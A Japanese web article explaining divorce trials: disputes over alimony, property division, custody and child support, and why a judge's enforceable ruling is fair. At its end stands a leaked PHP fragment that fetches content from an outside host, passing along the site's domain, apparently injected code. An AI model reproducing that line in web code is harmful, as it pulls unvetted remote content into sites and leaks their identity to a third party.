前へ
次へ

強制力のある判決を裁判官が公平に出す離婚裁判

ご縁があって夫婦になったものの長い人生の中で、別々の道を歩むことを考えるケースもあります。なかなか進展をしない離婚問題をスムーズに解決させるためにも、法律に頼るやり方となる離婚裁判は解決策の一つの手段です。お互いに話し合いをしても一方通行であり、離婚調停さえも良い状態にはならず、もう裁判しかないということはあります。一体何を裁判では争うことができるのか、その点を理解してから裁判をするか決めることです。婚姻を解消するということはお金の問題も出てきますので、慰謝料問題は深刻な部分であり、それ以前に慰謝料の支払いはあるかどうかからはじまります。2人で築き上げてきた財産に関しても、別れるのであればキチンとしなければなりません。財産はどうやって分けるべきか、もはや財産の分与をしないかなど掘り下げて争うことになります。子は鎹ではあるものの夫婦間の愛が冷え切っては一緒に生きていくことはできず、だからと言って親だって子供に辛い思いはさせたくはありません。親権はどちらが持つのか、面会や交流はどのようにするのか、子供を育てていかねばなりませんので、養育費の問題も解決をしておく必要があります。なぜ夫婦の問題なのに裁判という法律を用いるべきかですが、離婚裁判では裁判官がいて双方の言い分を聞いて判断を公平にしてくれるためです。人間は感情の生き物であり、特に夫婦や家族が相手だと言葉も態度も容赦はありません。感情的になった話し合いに最善の糸口はなく、糸がさらに絡まり合って身動きが取れなくなるばかりです。裁判になると自分たちの感情をむき出しにして言い争いをするだけではなく、まずはそれぞれの立証活動も主張もしますが、それを冷静に第三者として聞き正しい判断をする裁判官がいます。それぞれの主張にも耳を傾けますし、何か証拠があればそれらも確認をしてから出される判断は公平だからです。裁判官により出される判決はまさに一刀両断、強制力もあります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top